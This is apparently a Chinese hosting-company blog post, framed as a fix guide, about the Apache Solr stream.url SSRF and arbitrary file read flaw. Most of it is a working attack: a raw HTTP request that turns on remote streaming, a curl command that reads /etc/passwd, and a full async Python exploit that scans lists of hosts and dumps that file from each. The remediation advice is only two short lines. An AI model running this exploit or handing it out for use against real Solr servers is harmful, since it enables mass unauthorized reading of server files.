Apache-Solr任意文件读取漏洞怎么修复

Apache-Solr任意文件读取漏洞怎么修复

这篇文章主要讲解了“Apache-Solr任意文件读取漏洞怎么修复”，文中的讲解内容简单清晰，易于学习与理解，下面请大家跟着小编的思路慢慢深入，一起来研究和学习“Apache-Solr任意文件读取漏洞怎么修复”吧！

漏洞描述

Apache Solr是一个开源的搜索服务，使用Java语言开发。Apache Solr的某些功能存在过滤不严格，在Apache Solr未开启认证的情况下，攻击者可直接构造特定请求开启特定配置，并最终造成SSRF或文件读取漏洞。

漏洞评级

Apache Solr stream.url SSRF与任意文件读取漏洞 中危

影响版本

Apache Solr 所有版本

安全版本

官方不予修复，暂无安全版本。

复现过程

环境搭建

docker search solr  docker pull solr  docker run -d -p 8983:8983 solr  docker  exec  -it  实例id  /bin/bash  cp -r server/solr/configsets/_default/conf /var/solr/data/test1

参考：http://www.bubuko.com/infodetail-3118740.html

漏洞复现

首先获取core

以my_core测试为例，

POST /solr/my_core/config HTTP/1.1  Host: x.x.x.x:8983  Cache-Control: max-age=0  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  Accept-Encoding: gzip, deflate  Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  Connection: close  Content-Length: 84      {"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

读取文件

curl "http://ip:8983/solr/my_core/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"

EXP：

#!/usr/bin/python  # coding: UTF-8  import argparse  import asyncio  import json  import pathlib  from typing import Tuple  from urllib.parse import urlparse    import httpx      class URLAction(argparse.Action):  def __call__(self, parser, namespace, values, option_string=None):  if not urlparse(values):  raise ValueError("Not a valid url!")  setattr(namespace, self.dest, values)      class FILEAction(argparse.Action):  def __call__(self, parser, namespace, values, option_string=None):  if not pathlib.Path(values).exists():  raise ValueError("File not exists!")  setattr(namespace, self.dest, values)      parser = argparse.ArgumentParser(description="Solr Poc")  parser.add_argument("--host", type=str, action=URLAction, help="target host uri")  parser.add_argument("--file", type=str, action=FILEAction, help="target host file")  parser.add_argument("--conn", type=int, default=10, help="asyncio max connetions")  args = parser.parse_args()      SEM = asyncio.Semaphore(args.conn)  RESULT = {}      async def check(host: str) -> Tuple[str, bool]:  status = False  async with SEM:  async with httpx.AsyncClient(base_url=host) as client:  try:  core_data = (  await client.get(  "/solr/admin/cores?indexInfo=false&wt=json", timeout=3  )  ).json()  except httpx.ReadTimeout:  print(f"{host} TimeOut!")  status = "TimeOut"  else:  if (data_status := core_data["status"]) :  core =  list(data_status.keys())[0]  await client.post(  f"/solr/{core}/config",  json={  "set-property": {  "requestDispatcher.requestParsers.enableRemoteStreaming": "true"  }  },  )  result_data = (  await client.post(  url=f"/solr/{core}/debug/dump?param=ContentStreams",  data={"stream.url": "file:///etc/passwd"},  )  ).json()  if (streams := result_data["streams"]) :  print(streams[0]["stream"])  status = True  finally:  RESULT[host] = status  return host, status      async def loop(urls):  await asyncio.gather(*list(map(check, urls)))      def main():  result_file = pathlib.Path("solr_main.json")  try:  urls = set()  if args.host:  urls.add(args.host)  if args.file:  with pathlib.Path(args.file).open("r") as file:  urls = urls.union(  {url for line in file if urlparse((url := line.strip()))}  )  print(f"tasks: {len(urls)}")  asyncio.run(loop(urls))  except KeyboardInterrupt:  pass  finally:  with result_file.open("w") as file:  file.write(json.dumps(RESULT, indent=4, ensure_ascii=True))

修复建议

1. 增加身份验证/授权

2. 禁止Solr API 以及管理 UI 直接对公网开放。设置防火墙，以便只允许受信任的计算机和人员访问。

感谢各位的阅读，以上就是“Apache-Solr任意文件读取漏洞怎么修复”的内容了，经过本文的学习后，相信大家对Apache-Solr任意文件读取漏洞怎么修复这一问题有了更深刻的体会，具体使用情况还需要大家实践验证。这里是高防服务器网，小编将为大家推送更多相关知识点的文章，欢迎关注！

[微信提示：高防服务器能助您降低 IT 成本，提升运维效率，使您更专注于核心业务创新。

[图文来源于网络，不代表本站立场，如有侵权，请联系高防服务器网删除]
[